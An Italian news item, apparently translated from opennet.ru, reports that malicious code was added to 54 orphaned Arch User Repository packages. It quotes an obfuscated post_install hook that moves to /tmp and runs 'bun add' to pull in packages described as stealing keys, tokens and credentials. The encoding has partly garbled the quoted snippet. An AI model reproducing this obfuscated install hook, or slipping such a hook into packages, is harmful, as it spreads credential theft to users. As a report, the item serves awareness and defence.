In AUR ĆØ stato inserito codice malevolo in altri 54 pacchetti

Nonostante le misure adottate dagli sviluppatori di Arch Linux, l'attività di inserimento di codice malevolo nei repository AUR (Arch User Repository) non è stoppata. Solo alcune ore fa, codice malevolo è stato inserito in altri 54 pacchetti, rimasti senza manutentori (storia delle modifiche di annullamento). A differenza degli attacchi di ieri, questa volta è stata utilizzata la piattaforma bun per l'installazione delle dipendenze malevole invece del gestore di pacchetti npm. Per eludere i filtri implementati, viene inserita nella funzione post_install una stringa offuscata, nella quale viene eseguito il comando «bun add» per installare pacchetti con codice malevolo che esegue scansioni e invia a un esterno server chiavi, token e credenziali.

post_install() {
$’\x63′»dĀ» Ā«/Ā»ā€˜t'Ā»mĀ»ā€˜p’ && Ā«bĀ»ā€˜uĀ»n’ ā€˜a'Ā»dĀ»ā€˜d’ $’\141\x6eĀ»s'Ā»i»»-Ā«$’\143Ā»oĀ»lĀ»oĀ»r’$’\x73′ ā€˜n'Ā»eĀ»ā€˜x'Ā»t»»fĀ»ā€˜iĀ»lĀ»eĀ»-Ā»jĀ»s’
}

Fonte: opennet.ru

Acquista hosting affidabile per siti web con protezione DDoS, server VPS VDS šŸ”„ Acquista hosting affidabile per siti web con protezione DDoS, server VPS VDS - ProHoster